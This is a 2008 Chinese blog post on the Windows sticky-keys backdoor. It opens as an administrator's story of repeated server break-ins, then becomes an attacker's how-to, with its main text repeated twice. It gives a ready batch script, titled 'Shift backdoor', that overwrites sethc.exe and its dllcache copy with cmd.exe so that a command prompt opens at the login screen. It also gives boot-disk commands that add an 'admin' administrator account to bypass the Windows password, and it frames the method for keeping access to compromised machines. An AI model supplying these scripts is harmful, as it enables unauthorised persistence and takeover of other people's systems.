上一篇
下一篇
实战shift连按5次,粘滞键的漏洞
作者:晨曦旋风 日期:2008-06-16
最近刚接手管理的公司一台服务器,三天两头发现被提权入侵,好郁闷...
开始接手时,我就立即设置了各种权限,自认为没什么安全漏洞了.但时隔几天,
就能发现administrators组多了用户...
今天又发现sqlDebugger被提权为管理员了,害我花大量时间去查SQL是否有注入点.
呵呵,,废话多了...进入原题,后来是偶然的发现是被人利用了系统粘滞键漏洞.至于
粘滞键大家都不陌生,只要连按5下shift键,就会被调用出来. 好,问题就在这了!!也
可以说是微软系统的一个安全漏洞吧,因为不仅仅是开机桌面状态下连按5下shift键
,就是远程连接的时候,没输用户和密码,也可以连按5下shift键调用粘滞键功能....
说到这,可能大家能想到了..只要将系统默认的粘滞键所调用文件替换掉其他文件,比如
说换成cmd.exe 这样就可以任意执行命令了!! 如果我们抓到一台肉鸡,按照上述方法,
即使提权的管理员用户被删,我们也可以远程空连,然后连续按5下shift键,就能调用出
命令提示行,接下来又可以创建个管理员....后果可想而知....
下面,我给出个批处理命令,是将cmd.exe替换到粘滞键所调用的sethc.exe文件:
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门
echo 晨曦博客 http://www.chen-xi.cn
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
将以上另存为 shift.bat 并运行它,系统里的 sethc.exe 就被换成了改了名的 cmd.exe了!
到这我就不多说了,明白人就知道如何利用这个漏洞!~
另外按照以上思路,用连按5次shift键也可以破解windows的登录密码了..
首先用DOS盘启动.转到c:\windows\system32\下面.输入如下命令:
copy sethc.exe sethc2.exe 备份粘滞键文件
copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe
然后重启机器.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入:
net user admin admin /add 添加admin用户,密码是admin
net localgroup administrators admin /add 提升admin为管理员
开始接手时,我就立即设置了各种权限,自认为没什么安全漏洞了.但时隔几天,
就能发现administrators组多了用户...
今天又发现sqlDebugger被提权为管理员了,害我花大量时间去查SQL是否有注入点.
呵呵,,废话多了...进入原题,后来是偶然的发现是被人利用了系统粘滞键漏洞.至于
粘滞键大家都不陌生,只要连按5下shift键,就会被调用出来. 好,问题就在这了!!也
可以说是微软系统的一个安全漏洞吧,因为不仅仅是开机桌面状态下连按5下shift键
,就是远程连接的时候,没输用户和密码,也可以连按5下shift键调用粘滞键功能....
说到这,可能大家能想到了..只要将系统默认的粘滞键所调用文件替换掉其他文件,比如
说换成cmd.exe 这样就可以任意执行命令了!! 如果我们抓到一台肉鸡,按照上述方法,
即使提权的管理员用户被删,我们也可以远程空连,然后连续按5下shift键,就能调用出
命令提示行,接下来又可以创建个管理员....后果可想而知....
下面,我给出个批处理命令,是将cmd.exe替换到粘滞键所调用的sethc.exe文件:
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门
echo 晨曦博客 http://www.chen-xi.cn
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
将以上另存为 shift.bat 并运行它,系统里的 sethc.exe 就被换成了改了名的 cmd.exe了!
到这我就不多说了,明白人就知道如何利用这个漏洞!~
另外按照以上思路,用连按5次shift键也可以破解windows的登录密码了..
首先用DOS盘启动.转到c:\windows\system32\下面.输入如下命令:
copy sethc.exe sethc2.exe 备份粘滞键文件
copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe
然后重启机器.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入:
net user admin admin /add 添加admin用户,密码是admin
net localgroup administrators admin /add 提升admin为管理员
文章来自: 
引用通告: 
Tags: 
相关日志:
评论: 0 | 引用: 0 | 查看次数: 3669
发表评论